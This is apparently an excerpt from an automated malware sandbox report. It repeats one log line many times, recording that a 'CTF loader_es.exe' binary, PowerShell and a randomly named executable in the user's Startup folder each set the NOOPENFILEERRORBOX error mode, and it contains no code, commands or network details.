Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
